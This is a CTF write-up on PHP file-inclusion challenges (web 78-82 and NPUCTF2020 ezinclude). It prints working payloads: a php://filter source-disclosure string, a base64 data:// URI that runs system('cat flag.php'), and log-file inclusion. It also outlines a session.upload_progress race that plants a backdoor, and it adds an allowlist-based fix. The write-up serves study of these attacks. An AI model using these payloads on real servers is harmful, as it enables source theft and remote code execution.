- Reviewing file inclusion vulnerabilities today
web 78
payload:
?file=php://filter/convert.base64-encode/resource=flag.php
web 79
payload:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
web 80-81
- This challenge requires some technique from the start
- The source code filters the strings `php` and `data`, so those pseudo-protocols cannot be used
    if(isset($_GET['file'])){
        $file = $_GET['file'];
        // blacklist: only the substrings "php" and "data" are replaced,
        // a plain filesystem path still reaches include()
        $file = str_replace("php", "???", $file);
        $file = str_replace("data", "???", $file);
        include($file);
    }else{
        highlight_file(__FILE__);
    }
- payload
?file=/var/log/nginx/access.log
- The file inclusion targets the log file
web 82
    if(isset($_GET['file'])){
        $file = $_GET['file'];
        // same blacklist as web 80, now also replacing ":" and "."
        // so neither wrapper URLs nor paths with a file extension survive
        $file = str_replace("php", "???", $file);
        $file = str_replace("data", "???", $file);
        $file = str_replace(":", "???", $file);
        $file = str_replace(".", "???", $file);
        include($file);
    }else{
        highlight_file(__FILE__);
    }
- `:` and `.` are filtered as well, so the log file method from the previous challenge no longer works
- I didn't know how to do this one and read the WP
- Reference material: file inclusion via session.upload_progress
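The str_replace blacklist in web 80-82 only rewrites a few substrings, so any path that does not contain them is passed straight to include(). The following is an added example, not code from the challenges: it puts the web 80 filter next to an allowlist-based resolver (names `weak_include`, `safe_resolve`, the `$pages` map and `$baseDir` are my own assumptions) that never hands user input to include() at all.

```php
<?php
// Added example, not part of the challenge source.
// Weak pattern from web 80: rewrite blacklisted substrings, then include.
// Returns the string that would reach include().
function weak_include(string $file): string
{
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    return $file;
}

// Hardened form: map a short key to a known file under a fixed directory.
// $pages and $baseDir are assumptions for this example.
function safe_resolve(string $key, string $baseDir): ?string
{
    $pages = ['home' => 'home.php', 'about' => 'about.php'];
    if (!isset($pages[$key])) {
        return null;                       // unknown key: refuse
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $pages[$key]);
    // realpath() resolves ../ and symlinks, and returns false for
    // nonexistent files and for stream wrappers such as php://filter.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside $baseDir
    }
    return $path;
}

// Constructed inputs showing the difference.
var_dump(weak_include('/var/log/nginx/access.log'));       // unchanged: would be included
var_dump(weak_include('php://filter/resource=flag.php'));  // "???://filter/resource=flag.???"
var_dump(safe_resolve('/var/log/nginx/access.log', __DIR__)); // NULL: not an allowed key
var_dump(safe_resolve('home', __DIR__)); // a path only if home.php exists under __DIR__
?>
```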
Bonus challenge of my own: [NPUCTF2020]ezinclude
- On entering the page there is a hint
    <!--md5($secret.$name)===$pass -->
- After capturing the response, the hash value is submitted directly in the URL
- This then gives another hint
    include($_GET["file"])
- Try to read the source code
    /flflflflag.php?file=php://filter/convert.base64-encode/resource%3dflflflflag.php
    <html>
    <head>
    <script language="javascript" type="text/javascript">
    window.location.href="404.html";
    </script>
    <title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
    </head>
    <body>
    <?php
    $file=$_GET['file'];
    if(preg_match('/data|input|zip/is',$file)){
        die('nonono');
    }
    @include($file);
    echo 'include($_GET["file"])';
    ?>
    </body>
    </html>
- With `data`, `input` and `zip` filtered, the pseudo-protocols do not work directly. Two methods came to mind: one is the log file (path unknown), the other is file inclusion via session.upload_progress
- My solution is to use session.upload_progress to include the file and then win the race condition
- POC
- Include the temporary file
- Race condition
- Write a backdoor
- POST parameter: cmd=phpinfo();
- The flag is in phpinfo(). I searched through the directory files and only after looking at the WP learned that it is in phpinfo()